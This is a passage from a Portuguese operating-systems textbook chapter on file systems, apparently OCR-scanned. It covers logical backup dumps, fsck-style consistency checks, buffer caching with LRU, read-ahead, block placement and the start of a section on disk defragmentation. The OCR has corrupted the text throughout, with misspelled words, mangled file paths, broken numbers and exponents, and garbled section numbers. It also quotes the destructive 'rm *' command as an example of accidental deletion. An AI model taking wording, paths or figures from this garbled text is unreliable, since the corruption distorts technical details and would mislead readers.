manddos em um ou mais 'arquivos de blocos defeituosos' 
ou indkados em mapas de bits. e absolu ta menie essencial 
que o programa de cópia fisica tenha accsso a essa infor- 
maęao para evitar que esses blocos defeituosos sejam co- 
piados, o que impedlria, portanto, a ocorrencia de erros in- 
icrminaycis dc lei tura de disco d marne o processo de cópia. 

As principais vantagens da cópia fisica sao a simplicida- 
de e a grandę rapidez (basicamente, ela pode executar nas 
taxas de tramferenoa do disco). As desvantagens sao a in- 
capacidade de saltar diretórios especificos, permitir cópias 
inerementais e restartrar arquivos iodividuais. Por essas ra- 
zoes, a maioria das instalaęóes utiliza cópias lógicas. 

Uma cópia lógica (ou dump lógico) sc da a partir dc 
um ou mais diretórios especificados e copia recursivamente 
todos os arquivos c diretórios la encontrados que teiiham 
sido akcrados desdc olguma data especificada (por exein- 
plo, a data do ultimo backup de uma cópia incremental ou 
a data de instalaęao do sistema para uma cópia complcta). 
Portanto, cm uma cópia lógica, a fita contem uma serie de 
diretórios e arquivos criieriosamente identlficados, o que 
facilita a restaiiraęao dc um arquivo ou de um diretório 
cspedfico ąuando rcquisitado. 

Como a cópia lógica e a soluęao mais usual, estudare- 
mos um algoritmo comum em detallies, usando o exemplo 
da Figura 4.22 para nos orientar, A maioria dos sistemas 
UNIX usa esse algoritmo. Na figura, vemos uma arvore 
coni diretórios (quadrados) e arquivos (cn culos). Os itens 
sombreados foram modificados a partir de urna certa data 
de base e, portanto, precisarn ser copiados. Os itens vazados 
nao predsam ser copiados. 

Esse algoritmo tambem copia todos os diretórios (mes- 
mo os inaltcrados) quc ficam no caminho de um arquivo 
ou diretório modificado. fsso ocorre por duas razoes: pri¬ 
meiro, para que seja possfvel restaurar os arquivos e os di¬ 
retórios copiados em um novo sistema de arquivos em um 
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I Figura 4.22 Um sistema de arquivos a ser copiado. Os quadrados sao diretórios e os circulos sao arquivo$. Os itens sombreados 
forann modificados desde a ultima cópia. Gada diretorio e cada arquivo esta identificado pelo numero de seu i-node. 


computador di terenie. Desse modo, os program as dc cópia 
c restauraęao podem ser usados para transportar sistemas 
de arquivos imeiros enire computadores. 

A segunda razao e copiar diretórios inalrerados que es- 
tejam acima dc arquivos modificados e possibilitar qne se 
restaure um unito arquivo dc mancira incrcmental (pos- 
sivelmente para puder recuperar alguma bobagem kita), 
Snponha que urna cópia completa do sistema de arquivos 
seja feiia no domingo a noiie c que urna cópia incrcmcn- 
lal seja feiia na segunda-feira a noite. Na teręa-feira, o dire- 
tório łusr/jhsłprojłnrl e removido, com todos os diretórios e 
arquivos sob ek. Na cłara e agradavel rnanha da quarta-fei- 
ra, o usuario quer restaurar o arqmvo fusr/jhs/pro}fmVptamf 
summary. Contudo, nao e possfrel restaurar apenas o arquivo 
stfłft/fiajyporąue nao ha kigar para coloca-lo. Antes devem ser 
restaurados os diretórios nr3 e plam, Para obter sens proprie- 
rarios, modos, horarios etc. corretos, esses diretórios devem 
estar prcsenteś na fi ta da cópia, mesmo quc clcs próprios nao 
lenham sido modificados desde a cópia completa amerior. 

O algoriimo de cópia mantem um mapa dc bits inde- 
xado pelo nu mero do i-node com varios bils por i-nodc. 
Os bits serao colocados em 1 ou 0 nesse mapa conforme a 
cxecuęao do algoriimo. O algoritmo opera em quairo fases, 
A fasę i comeęa a pa i itr do diretorio iniciai (no excmplo 
dado, o diretório-raiz) c verifica todas as entradas. Para 
cada arquivo ino di fi ca do, seu i-node e marcado no mapa 
dc bits. Cada diretorio tainbem e marcado (mo di fi ca do ou 
nao) e, entao, recursivarnenie impecie na do, 

Ao finał da faso I, todos os aiquivos e todos os dire¬ 
tórios modificados foram marcados no mapa dc bits, con- 
forme mostra (pelo sombreamento) a Figura 4.2 3{a), A 
fasę 2 concdiualmeme percorre dc novo a arvore dc modo 
recursivo, desmarcando qualqucr diretorio que nao ten3ta 
arquivos ou diretórios modificados dentro dele ou sob cle. 


Essa fasę dcixa o mapa dc bits conforme mostra a Figura 
4.23(b). Observe que os diretórios 10, 11, 14, 27, 29 e 30 
es tao agora dcsmarcados, pois clcs nao contcm nada mo* 
dificado sob eles. Eles nao serao copiados. Por outro lado, 
os diretórios 5 c 6 serao copiados mesmo que clcs próprios 
nao tenharn sido modificados, pois serao necessarios para 
restaurar as mudanęas dc boje para urna nova maquina. 
Para fins de eficicncia, as fases 1 e 2 podem ser combinadas 
para percorrcr a arvore somente urna vez. 

Nesse ponto, sabe-se quais diretórios e arquivos devem 
ser copiados: sao aqueles marcados na Figura 423(bp A 
fasę 3 consiste em varrer os i-nodes por ordem numerka e 
copiar todos os diretórios que estiverem marcados para có¬ 
pia. Eles sao mosirados na Figura 4.23(c). Gada diretorio e 
prefixado por sens aiributos (proprietario, horario etc.) para 
que possa ser restaurado. Por lim, na fasę 4, os arquivos 
marcados na Figura 423(d) tarabem sao copiados, nova- 
menie prefkados por sens aiributos, isso completa a cópia. 

Restaurar um sistema de arquivos a par tir das fi las de 
cópia e simples* Para comeęar, um sistema de arquivo$ va- 
zio e criado no disco. Depois, a cópia completa mais re- 
cente e restaurada. Como os diretórios aparecem primeiro 
na fita, eies serao restaurados primeiro, resultando em um 
esqueleto do sistema de arqiiivos. Eni seguida, os próprios 
arquivos sao restaurados. Esse processo e, entao, repeti- 
do para a primeira cópia incremental feiia depois da cópia 
completa, em seguida para a prózima, e assim por dianie. 

Embora a cópia lógica seja simpies, ha ałgumascomjkica- 
ęoes* Urna dc las ć qtic, como a lisia de blocos livres nao e um 
arquivo ; da nao ć copiada e, desse modo, devcser rcconsnuf- 
da desde o ponto dc partida, depois da rcsiauraęao de todas 
ascópias. £ sempre possfvel (azer isso, desde quc o conjumo 
de blocos ]ivrcs seja apenas um eomplemeruo do conjumo dc 
blocos comidos em todos os arquivos combinados. 
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I Figura 4.23 Mapas de bits utilizados no algoritmo da cópia lógica. 


Outra complicaęao saoas iigaęóes {links}. Se um arquivo 
estiver ligado a dois ou mais diretórios, e imponante que seja 
restaurado semenie unia vez e que todos os diretórios que 
suposTamente estejam apontando para ele assim o faęani. 

Mais uma complicaęao e o lalo de os arqmvos UNTX 
pod erem conter lacunas. Ź valido abrir um arquivo, escre- 
ver alguns bytes nele e depois deslocar para uma posięao 
mais disiame e escrever mais alguns byies. Os blocos eiure 
des nao sao parte do arquivo e na o deveriam ser copiados 
nem restaurados. Arquivos conlendo a imagem de proces- 
sos terminados de modo anormal {corefiks) apresentam um 
grandę intervalo entre os segmenlos tle dados e a pilha. Se 
nao for traiado adequadamente, ca da arquivo core resiau- 
rado preenchera toda essa area com zeros e, portanto, tera 
o mesmo lamanho do espaęo dc endereęamento virlual 
(por exemplo, 2^byies ou, piór ainda, 2 M bytes). 

Por firn, arquivos espedais, chamados pipes, e oulros 
similarcs minca devem ser copiados, Na o importa em qual 
diretório eks possam estar (des nao precisam estar restri- 
los ao łdev ). Para obter mais informaęoes sobrc backups em 
sistemas de arquivos, veja as seguintes publieaęoes; Cher- 
venak et al. (1998) e Zwicky (1991). 

A densidade das fiias nao esta mclhorando tanio quan- 
to a dos discos, falo que esta gradativamente kvando a 
uma siluaęao na qual a criaęao de uma cópia de seguran- 
ęa de um disco muito grandę pode rcąuerer diversa$ fiias. 
Embora exisiam robós para a iroca automalica de fitas, se 
a icndencia conti nu ar, as fiias acabarao se tornando nuii- 
lo peąuenas para serem usadas como midia para backups. 
Ncsse caso, a u ni ca maneira de copiai um disco sera u li¬ 
ii zando ouiro disco. Em bora o simples espelhamemo de 
discos seja uma possibilidade, esąuemas mais sofisticados, 
denominados RAIDs, serao discutidos no Capńulo 5 + 

4.4.51 Consistencia do sistema de arquivos 

Outra area na qual a confiabilidade e imponante e a 
consistencia dos sistemas de arquivos. Muitos sistemas de 
arquivo$ kem os blocos, modificam seu comeudo c só de¬ 
pois os escrevem. Se o sistema cair a mes que todos os blo¬ 
cos alterados tenham sido escritos, o sistema de arquivos 
podera fi car em um estado i neon si sten te, Hssc problema 
sera cspecialmcmc cntico sc alguns dos blocos ainda nao 
escritos forem blocos dc i-node, blocos de diretório ou blo¬ 
cos que co men ha m a lista de blocos livrcs. 


Para iratardo problema de inconsistenda nos sistemas 
de arquivos, a maioria dos computadores tern um progra¬ 
mu utilitario que verifica a consistencia do sistema de ar- 
quivos. Por exemplo, o UNIX tern o fsek. e o Windows tern 
o scandhk. Esse utilitario pode ser executado sempre que o 
sistema estiver sendo inicializado, espedalmente depois de 
uma queda. A descrięao a seguir mostra como o fsek firn- 
clona. O ScanDisk lunciona cm um sistema de arquivos dife- 
rente, mas o principio geral de usara rediindanda inerente 
do sistema de arquivos para consertado vale para os dois. 
Todos os veriftcadores conferem cada sistema de arquivos 
(parlięao do disco) uidependcmcmeme dos outros. 

Existem dois tipos de verificaęoes de consistencia: por 
blocos c porarqiiivos. Para verificara consistencia dos blo¬ 
cos, o programa constrói duas tabclas, cada uma com um 
comador para cada bloco, inicialmeme contendo 0. Os eon- 
tadores na primcira tabela moniioram quantas vezes cada 
bloco esta presentc cm um arquivo; os cantadores na sc- 
gunda tabela registram quantas vczcs cada bloco esta pre- 
sente na lista de livres (ou mapas de bits de blocos tivrcs). 

O programa, en ta o, le todos os i-nodes usando um dispositi- 
vr> cm (raw), isto e, que ignora a esirutura dos arquivos e apenas 
devolve todos os blocos do disco comeęando no 0. A partii dc 
um i-node, e posswel construir uma lista de todos os numeros 
de blocos usados no arquivo correspondente. Conformę cada 
numerode bloco e lido, seu contador na primeira tabela e inere- 
mentado. O programa en tao ve ii lica a lista o u o mapa de bils de 
livres para enconirar todos os blocos que nao estiverem sendo 
usa dos. Cada ocorrenda de um bloco na lista de livres faz com 
que seu comador na segunda tabela seja inerememado* 

Sc o sistema dc arquivos cstiver mconsisteote, cada blo¬ 
co tera um 1 ou na primeira ou na segunda tabela, como 
mostra a Figura 4.24(a). Contudo, depois de uma queda no 
sistema, as labelas podem ficar como mostrado na Figura 
4,24(b), na qual o bloco 2 nao ocorre em nenhuma tabela, 
Sera reportado como um bloco desaparecido. Embora os 
blocos desaparecidos nao causem nenhum ma!, eles ocupam 
espaęo e, porianto, reduzem a capaddade do disco. A solu- 
ęao para os blocos desapareddos e simples: o verificador de 
sistema de arquivos apenas os indu i na lista de blocos livres, 

Outra situaęao possfvd e a most rada na Figura 4,24 (c), 
Nela venios um bloco, o mimero 4, que ocorre duas vezes na 
lisia de fivres. (Só ocorrem duplicaias se a lisia de livres for 
realnienie uma lista; em um mapa de biss, isso c impossiveb) 
A soluęao aqui tambem e simples: reconstruira lista de !ivres. 
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Numero de bloco Numero do bloco 
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(c) (d) 


I Figura 4.24 Estados do sistema de arquivos. (a) Consistente. (b) Bloco desaparecido. (c) Bloco duplicado na Eista de livres. (d) 
Bloco de dedos dupiicados. 


A piór coisa que pode ocorrer e o mesmo bloco dc 
dados cstar prescnte cm dois ou mais arquivos, como 
mostra a Figura 4,24(d) com o bloco 5. Sc urn desses 
arquivos for removido, o bloco 5 sera colocado na lisia 
dc Iivres, resuliando na situaęao ein que o mesmo bloco 
esta cm uso e livre ao mesmo tempo. Se a mb os os arqui- 
vos forem removidos, o bloco sera colocado na lisia de 
livres duas vezes. 

O quc o verificador de sistema de arquivos dcvc fazer 
e alocar mn bloco livre, copiar o eonie udo do bloco 5 ndc 
e inserir a eópia cm urn dos arquivos, Desse modo, o con- 
teudo dos arquivos permanece ina llera do (embora quase 
certa me me confuso), mas a estrutma do sistema de arqui- 
vos, pelo menos, fica consistente. 0 erro deve ser reportado 
para permitir que o usuario impecione o dano. 

Alem dc averigiia r se ca da bloco esta contabilizado cor- 
retamente, o vcrilicador dc sistema de arquivos tambern 
dieca o sistema dc direlórios. Alem disso, ele usa urna la- 
bela de contadores, mas por arquivos, e nao por blocm Ele 
inirializa a pa ni r do diretório-raize recursiyamente percor- 
re a arvore, inspeciona ndo ca da diretório do sistema de ar- 
quivos. Para ca da arquivo no diretório, ele inerementa urn 
contador para contar o uso do arquivo. Lembre-se de qtte, 
por causa de ligaęoes estritas {hard iinks), urn arquivo pode 
aparccer cm dois ou mais direlórios, As ligaęoes simboMcas 
nao contam c na o fazem eom que o contador ineremente 
para o arquivQ-alvo. 

Quando estiver tu do termin a do, havera unia lista, 
indexada pelo numero do i-node, indicando quantos di- 
retórios eada arquivo eon tern. Ele emao eomparara esses 
ntimeros eom as contagens de ligaęoes armazenadas nos 
próprios i-nodes. Essas contagens inidam cm i quando 
uni arquivo ć criado c sao incrcmcntadas a coda vcz quc 
uma llgaęao cstriia c lei ta para o arquivo. Em um sistema 
dc arquivos eonsisłente, os contadores dcvem ser iguais. 
Contudo, ha a possibilidade de ocorrerem dois Itpos de 
erro; a contagem de ligaęoes no i-node pode ser alta ou 
baixa demais. 


Se a contagem dc Eigaęóes for mais alta que o numero de 
entradas de diretório, emao, mesmo quc todos os arquivos 
sejam removidos dos direlórios, a contagem ainda sera difc- 
renie dc zero e o i-node nao sera rem o vi do. Esse erro nao 
ć grave, mas consome espaęo de disco com os arquivos que 
nao ocupam nenlmm diretório. Ele deve ser repa rado atri- 
buindo-se o valor correio a contagem de ligaęoes no i-node, 

O outro erro e petenci a Imente catastrófico. Se duas 
entradas de diretórios forem redirccionadas para um ar- 
quivo, mas o i-node indicar que ha someme unia, quando 
uma das entradas dc direlório for removida, a contagem do 
i-node ira para zero, Quamlo uma contagem do i-node vai 
para zero, o sistema de arquivos marca-o como nao usa do 
e libera todos os seus blocos. Essa aęao resultara em um 
dos diretó rios apomando agora para um i-node nao usa do, 
cujos blocos podem logo ser atribuidos a outros arquivos. 
Novamente, a soluęao e foręar a contagem de ligaęoes a 
assumir o numero real de entradas de diretório. 

Essas duas operaęoes — verificar os blocos e verificar 
os diretórios — sao muitas vezes integradas por razóes de 
eficiencia (isto e, someme uma verifieaęao nos i-nodes e 
necessaria). Out ras verificaęÓes tambern sao possfveis. Por 
exempIo, os diretórios tern um formato definido com nu- 
meros de i-node e nomes em ASCII. Se um numero de 
i-node for ma lor que o numero de i-nodes no disco, o dire¬ 
tório foi danificado. 

Alem disso, ca da i-node tern um modo—alguns validos, 
porem estranhos, como 0007 — que possibilita ao proprie- 
tario e seu grupo nao terem acesso a nada, mas permite que 
os usiiarios externos Ieiam, escrevam e executein o arquivo. 
Pode ser utii informar sobre arquivos que dao mais aces¬ 
so aos usuarios externos quc ao proprietario. Os diretórios 
com mais dc, por cxcmplo, mil entradas tambern sao sus- 
peitos. Arquivos em diretórios dc usuario, mas quc sao pro- 
priedadesdo superusuario c que tenhani o bil SETU1D em 1, 
sao problemas poienciais de seguranęa, pois esses arquivos 
adąuirem os poderes do superusuario quando executados 
por quaiquer usuario, Com um pouco de esforęo, pode-se 
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montar u ma lista bastame longa de situaęoes teciuca nieme 
validas, mas peculiares, iinportames de se conhecer. 

Os paragrafos antcriores discutiram o problema dc 
proteger o usuario contra desastres. Alguns sistemas de ar- 
quivos tambem se preocupam em proteger o usuario con¬ 
tra si mesmo. Se o usuario q u i ser digitar 

rm \o 

para remover todos os arquivos terminados com .o (arqui- 
vos-objeto gerados pdo tompilador), mas digita acidental- 
mente 

rm * 

(observe o espaco depois do asterisco), rm removera todos 
os arquivos no diretório atual c entao redamara que nao 
pode enconirar o .o. No MS-DOS e em alguns outros siste¬ 
mas, quando nm arquivo e remcmdo, tu do o quc acomece 
e a alteraęao de urn bit no diretório ou urna marcaęao no 
i-node do arquivo como removido. Nenhum bloco de disco 
e retornado para a lista dc livrcs ate que eles sejam real¬ 
nienie nccessarios, Portanto, sc o usuario descobre o crro 
imedialameme, e possivel execuiar um programa utiliiario 
especial que 'desremove' (isto e, restaura) os arquivos re- 
tmwidos, No Windows, os arquivos rcmovidos sao postos 
em urna cesta de reridagem, da qual eles podem ser recu- 
pcrados depois sc nccessario. E daro quc ncnliiim espaęo c 
libera do enquanto os arquivos nao sao realmeme removi- 
dos desse diretório. 

_ 4.4.41 Desempenho do sistema de arquivos 

O acesso a disco e muito mais lento que o acesso a me- 
mória. Ler uma palavra dc memória dcvc lcvar uns 10 ns. 
A leitura de mu disco rigido pode chegar a 10 MB/s, que e 
40 vezes mais lento por palavra de 32 biis, mas ainda de- 
vcm ser adtdonados a isso 5 a 10 ms para buscar a tri 1 ha e 
esperar que o setor desejado chegue sob a cabeęa de leitura. 
Se for necessaria somentc uma palavra, o acesso a memória 
sera da ordcm de milhoes dc vczcs mais rapido quc o aces¬ 
so ao disco. Como consequertGta dessa diferenęa no tempo 
de acesso, muiios sistemas de arquivos forani projetados 
com varias otimizaęóes para melhorar o desempenho. Nes- 
ta seęao abordaremos tres dessas otimizaęoes. 


Cache de blocos 

A tecnica mais usada para reduzir o acesso ao disco e 
a cache de blocos ou cache de buffer. {Cache ć promili - 
da da como se escreve e e derivada do verbo Iran ces cache t\ 
que significa esconder.) Neste comex!o, uma cache e uma 
coleęao de blocos que r do porno de vista lógico, pertencem 
ao disco, mas que estao sendo mantidos na memória para 
fms dc desempenho. 

Varios algoritmos podem ser usados para gerendar a 
cache, mas um bastame corntim verifka lodas as requisi- 
ęoes de leitura para averiguar se o bloco nccessario esta na 
cache. Se estiver, a reąuisięao de leitura podera ser satisfei- 
ta sem um acesso a disco. Se o bloco nao sc enconirar na 
cache, primeim ele sera lido do disco para a cache e, emao, 
eopiado para onde for nccessario. As próximas requisięÓes 
para o mesmo bloco podem ser satisfeitas a partir da cache. 

A operaęao da cache e ilustrada na Figura 4.25. Como 
ha muitos blocos (varios milhares deles) na cache, e prcciso 
algum modo de detcrmtnar rapidamente se um dado bloco 
esta presente. O modo usual e mapear o dispositivo e o en- 
dereęo de disco em unia tabela de espalhamento. Todos os 
blocos com o mesmo valor de espalhamento sao cncadeados 
em uma lista para quc a cadeia de colisao possa ser seguida* 

Quando um bloco tiver de ser carregado em unia cache 
cheia, algum bloco dcvc ser removido (e rccscrilo no disco sc 
de foi modificado depois de trazido ao disco), Essa situaęao e 
muito parecida com a paginaęao, e todos os algoritmos conhc- 
cidos dc subslitiiięao dc pagina descritos no Capimlo 3, como 
o FIFO r o algoritmo segunda chancc c o LRU {usado menos 
recentemente), sao aplicaveis + Oma diferenęa bem-vinda en- 
tre a paginaęao e a cache de blocos e que as referencias a ca- 
ehe sao relativamente raras; ponanto, e viavcl manier todos 
blocos na ordem exata do LRU com listas encadeadas. 

Na Figura 4.25, vcmos que, alem das colisocs cncadca- 
das a partir da tabela de espalhamento, ha tambem uma lista 
bidirerional ligando todos os blocos pela ordem de uso, com 
o bloco menos usado recememenie no infcio dessa lista e o 
mais usado recentementc no finał. Quando c refcrcnciado, 
um bloco pode ser removido de sua posięao na lista bidi- 
recional e transfer id o para o finał. Desse modo, e possweł 
manier a ordem LRU exata. 

Infelizmente, ha um problema. Agora que temos uma 
situaęao na qual o LRU exato e viavel, o LRU passa a ser 



! Figura 4,25 A estrutura de dados da cache de buffer. 
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indesejavel. A questao esta Iigada as quedas e a consisten- 
cia do sistema de arquivos discutidas na seęao amerior. Se 
lim bloco crftico, como um bloco i-no de, for trazido para a 
cadic c modificado, mas nao for reescrito no disco, cntao 
nma qucda do sistema dcixara o sistema de arquivos cm 
um cstado inconsistemc, Se o bloco i-nodc for colocado 
no fina E do cncadeanicnto LR U, pode ser quc espcrc mu i to 
a mes de cli ega r ao initio c ser reescrito no disco. 

Alena disso, algims blocos, como os blocos de i-node, 
rarameme sao referenciados duas vezes em um pequeno 
intervalo dc tempo. Essas consideraęóes Ievam a um esquc- 
ma LRU modificado, considerando dois fatores: 

1. t provavel que logo o bloco seja novamente neces- 
sario? 

2. O bloco e essendal para a consistenda do sistema de 
arquivos? 

Para anibas as questdes, os blocos pudem ser divididos 
em categorias como blocos i-node, blocos indiretos, blocos 
de di retorto, blocos de dados total nieme preenchidos e blo¬ 
cos de dados parcialmente preenchidos. Os blocos nao ime- 
diatamente necessarios vao para o infcio, em vez de ir para 
o finał da lista LRU; desse modo, sens buffers poderao ser 
reutilizados mais rapidamente. Os blocos que logo podem 
ser necessarios novamente — como um bloco parcialmente 
cheio que estivcr sendo preenchido — irao para o finał da 
lista e ali permancccrao por um longo tempo, 

A segunda questao e independente da pri metra. Se o 
bloco for essendal para a consistenda do sistema de ar- 
quivos (basicanieme todos, exceto os blocos de dados) e 
se de for modificado, devera ser escrilo imediatamente no 
disco, nao importando em qual extremidade da lista LRU 
sera inserklo. Escrevendo rapidamente os blocos crificos, 
reduzimos bastame a probabitidade de um desastre arrui- 
nar o sistema de arquivos. Embora o usuario deteste a idei a 
de um de sens arquivos ser prejudicado em um desastre, 
ele certamente detesiaria ainda mais que todo o sistema de 
arquivGs fosse perdido. 

Mesmo com essa medida para manier intacta a inte- 
gridade do sistema de arquivos, nao e desejavd manier 
blocos dc dados na cache por muito tempo ant es de serem 
escritus. Imagine o azar de alguem que es tej a usando um 
compmador pessoal para escrever um livro. Mesmo que 
hosso escritor periodica mente peęa ao ediior de iexto para 
escrever o arquivo sendo editado no disco, ha grandes pos- 
sibilidades de que tudo ainda esleja na cache e nada esteja 
no disco. Se o sistema sofrer um desastre, a estrntura do 
sistema de arquivos nao sera corrompida, mas um di a todo 
de trabalho estara perdido, 

Essa situ a ęa o nao preetsa ocorrer muilas vezes para que 
tenhamos um usuario descontente, Os sistemas utilizam duas 
talicas para trat a-la. A manelra UNIK e ter urna chamada de 
sistema, sync, que obriga todos os blocos modificados a serem 
transferidos tmedialamente para o disco. Quando o sistema e 
i nicią li za do, um próg ram a — em geral cha mado update — e 


inicializado em segimdo piano para adentrar um laęo inlinito 
que emite ehamadas sync, dormindo por 30 segundos enłre 
as ehamadas. Como resuliado, nao mais de 30 segundos de 
trabalho sao perdidos por causa de um ad den te. 

Atualmente o Windows possui unia chamada de siste¬ 
ma eqinvalente a o sync, FlushFleBuffers, mas nao foi sempre 
assim. Em vez disso, ele tinha nma esira legia diferente que, 
em alguns aspectos, era mci hor do que a do UMK (c piór 
em Oiitros), O que ele fazia era escrever cada bloco modifi¬ 
cado no disco assim que ele fosse escrito na cache. Caches 
nas quais lodos os blocos modificados sejam escriios ime- 
diatameme no disco sao ehamadas de caches de escrita 
direta {write-threugh caches). Elas rcqucrem mais E/S de 
disco que as caches que nao sao de escrita direta. 

A diferenęa entre essas duas taticas pode ser vista 
quando lim programa escreve um bloco unalmenie preen¬ 
chido de 1 KB, caraciere por caraaerc. O UNIK coletara 
todos os ca racie res na cache e escrevera o bloco u ma vez a 
cada 30 segundos, ou sempre que o bloco for removido da 
cache. Com caches de escrita direta, sera feiio um acesso 
ao disco para cada caraciere escrito. Ć dam que a maioria 
dos programas trabalha com um buf (er interno; assim, nor¬ 
ma! mente eles nao escrevem um caraciere, mas u ma lin ha 
ou unia unidade maior em cada chamada de sistema write. 

Uma consequencia dessa diferenęa na estraiegia de 
cache de blocos e que, assim que um disco (flexfvel) e 
removido de um sistema UNIK sem fazer um sync, qua- 
se sempre resultara em perda de dados e frequememente 
em um sistema de arquivos corrompido tambem. No MS- 
DOS, nao ha nenhum problema, Essas estraiegia s diferen- 
tes foram cscolhidas porąue o UNIK foi dcsenvolvido em 
um ambiente no qual todos os discos eram discos rigidos e 
nao removfveis, ao passo que o primeiro sistema de arqui- 
vos do Windows foi herdado do MS-DOS — que tcve sen 
infcio no immdo do disco fkxfveL Como os discos rigidos 
tornaram-se uma regra, a estraiegia UNIK, mais efldente 
(porem com piór confiabilidade), passou a ser o pa dra o c e 
tambem usada para discos rigidos no Windows. Entretan- 
to, conformc ja discutimos, sao necessarias outras medidas 
ijournaling) para melhorara confiabilidade do NTFS. 

Alguns sistemas operaciouais integram a cache de buffer 
e a cache de pa giną s de memória. Esse procedi niemo e espe- 
cialmente atraeme quando e possfvel usar arquivos mapeados 
em memória, ja que algunias dc suas paginas podem estar na 
memória por eon ta de uma paginaęao por demanda. Tais 
paginas dilicilmcnie sao diferemes dos blocos de arquivos 
na cache dc buffer. Nessc caso, eles podem ser tratados da 
mesma forma, com uma cache unica tanio para arquivos 
quanto para paginas, 

Leitura antecipada de blocos 

A segunda tecnica para melhorar o desempenho do sis- 
tema de arquivos e temar transferir os blocos para a cache 
anies que eles sejam necessarios para aumemar a iaxa de 
acertos. Panicularmeme, muitos arquivos sao li dos de modo 
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sequencial. Quando e solidtado ao sistema de arquivos que 
ele obtenha o bloco item um arquivo, ele o faz, mas, quando 
termina, realiza unia peąuena verificaęao na ca che a firn de 
averiguar se o bloco k + L ja esta 11 Se nao estiver, ele esca- 
lonara uma leitura para o bloco k + i na esperanta dc quc, 
ąuando for prcciso, cle ja tcnha chcgado a cachc — ou, peta 
mcnos, quc de csteja a caminho. 

£ claro que essa estrategia de leitura antedpada funrio- 
na somente para arqinvos que estejam sendo lidos sequen- 
dalmente. Para um arquivo com acesso aleatório, a leitura 
antedpada nao fundo na. Na vcrdade, da piorą a situaęao, 
pois emperra a largura de banda do disco, fazcndo Ieituras 
cm blocos nao usados e rcmovcndo blocos potcndalmcnte 
uieis da cachc (c possivdmcntc empcrrando rnais ainda a 
largura de banda transferindo os blocos de vo1ta ao disco 
se des tiverem skh modifkados). Para verificar se vale a 
pena fazer a leitura antedpada, o sistema de arquivos pode 
monitorar os padroes de acesso de cada arquivo aberto. Por 
exemplo, um bit assodado a cada arquivo indica se o ar- 
quivo esta em 'modo de acesso seąuencial' ou em 'modo 
de acesso aleatório'. Inidalmente, ao arquivo e dado um 
voto de confianęa, e dc e colocado em modo dc acesso 
sequenciah Contudo, sc for feito um posicionamcnto, o bil 
vai para 0, Se rccomcęarem as Ieituras scqucndais, o bit vai 
para 1. Desse modo, o sistema de arquivos tern condięoes 
de 'dar um cli ule' razoaveI entre fazer uma leilura ameci- 
pada ou nao. Se uma ou ciura vez fizer a escolha errada, 
isso nao sera um desasire, apenas um pequeno desperdfdo 
de largura de banda de disco. 

Reduęao do movimento do foraęo do disco 

Cachc de blocos c leitura antedpada nao sao os unlcos 
meios de aumentar o desempenho do sistema dc arquivos. 
Outra importante tecnita conslsle cm reduzir a quantidade 
dc movimentos do braęo do disco pondo os blocos sujeitos 
a mais acessos cm sequeocia, próximos uns a os outros, pre- 
ferendalmenie no mesmo eilindro. Ouanda um arquivo e 
escrilo, o sistema de arquivos deve alocar os blocos, um de 
cada vez, conforme a demanda. Se os blocos Iivres forem gra- 


vados em um mapa de bits e todo o mapa de bits esdver na 
memória principal, toma-se basta me facil escolher um blo¬ 
co livre tao próximo quanto possfve! do bloco amerior. Com 
uma lista dc blocos livres, na qua.l uma parte esta cm disco, 
e muito mais dificil alocar blocos próximos uns dos outros. 

Contudo, mesmo com urna lista dc blocos livres pode 
ser feito atgum agrupameiito de blocos, O truque e monit o- 
rar o armazenamento do disco nao em blocos, mas em gru- 
pos de blocos consecutivos. Se os setores forem de 512 bytes, 
o sistema podera usar blocos dc i KB (dois setores), mas 
alocando o armazenamento em disco cm urn da des de dois 
blocos (quatro setores). Isso nao e o mesmo que ter blocos 
de disco de 2 KB, ja que a cache ainda usaria blocos dc I KB 
e as transferendas de disco ainda seriam de 1 KB. No eman- 
to, ler seąuenciaimente um arquivo dessa maneira reduzi- 
ria o mi mero de posidonameutos por um fator de dois — 
urna mdhora considerave3 de desempenho, Uma variaęao 
sobie o mesmo tema e considerar o posi clona men to rota- 
cional. Quando aloca os blocos, o sistema lenta coloca-los 
consecutlvamente em um arquivo no mesmo eilindro. 

Oulro gargalo de desempenho em sistemas que usam 
i-nodes (ou qualquer coisa equiva]ente a i-nodes) e que 
ler um arquivo muito peąucno reąuer dois acessos ao dis¬ 
co: um para o i-node e omro para o bloco. A localizaęao 
atual do i-node ć m ostra da na Figura 4,2 6 (a), Nela todos 
os i-nodes esta o próximos do inicio do disco; portanto, a 
distancia media entre um i-node e seus blocos sera apro- 
ximadainente a meta dc do mi mero dc eilindros, exigindo 
pos i ci on a i ne n i os d ista n tes, 

Uma mdhora simples de desempenho pode ser con- 
seguida colocando-se os i-nodes no meio do disco e nao 
no inicio, reduzindo assim o posicionamento medio enire 
o i-node e o primeiro bloco por um fator de dois. Uma ou- 
tra ideia, most rada na Figura 4,26(b), eonsiste em diyidiro 
disco cm grupos de eilindros, cada qual com sens próprios 
i-nodes, blocos c listas de livrcs (MeKuslck et al., 1984). Na 
crlaęao de um novo arquivo, qualquer i-node pode ser es- 
eolhido, mas tenta-se encontrar um bloco no mesmo grupo 
de eilindros do i-node. Se nao ha bloco dispomvel, entao e 
usado um bloco do grupo vizinho de eilindros. 



Figura 4.26 (a) 1-nodes posicionacfos no inicio do disco, (b) Disco dividido em grupos de eilindros, cada um com seus próprios 
blocos e i-nodes, 
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4-4.51 Desfragmentando discos 

Inirialmcnte, quando o sistema opcrariona] c instalado, 
os próg ra mas e arquivos dos quais de prerisa sao instaladcs 
em sequencia a partir tlo imrio do disco, um seguido do ou- 
tro. Todo o espaęo livre do disco esta em urna linica imidade 
eonu gna depois dos arquivos instalados, tom o passar do 
tempo, entretanto, arquivo$ sao criados c removidos e e co- 
nium que o disco fique complctamcnte fragmcntadu, com 
arquivos e espaęos vazios por loda parte. Como resultado 
disso, ąuando um novo arquivo e criado, os blocos neces- 
sarios ao sen armazenanienio podem esiar espalliados por 
todo o disco, causando urna baixa no desempenho. 

E possivcl mcihorar o desempenho por mcio da mo- 
vimcntaęao dc arquivos dc forma a torna-los ćontiguos c 
com vistas a agrupar todo (ou quase todo) o espaęo livre 
em uma ou mais regioes contfguas no disco. O Windows 
tern um programa, o defrag, quc faz exa ta menie isso c quc 
deve ser executado com frequencia por seus itsuarios. 

A desfragmcntaęao ftinciona niclhor cm sistemas dc ar- 
quivos que possuem um espaęo livre considerivd cni uma 
regiao contfgua do finał da partię a o. Hsse espaęo permu 
te que o programa de desfragmemaęao seiecione arquivos 
Iragmentados próximos do imrio da pamęao e eopie to dos 
os seus blocos para o espaęo livre. Essc procedimento libera 
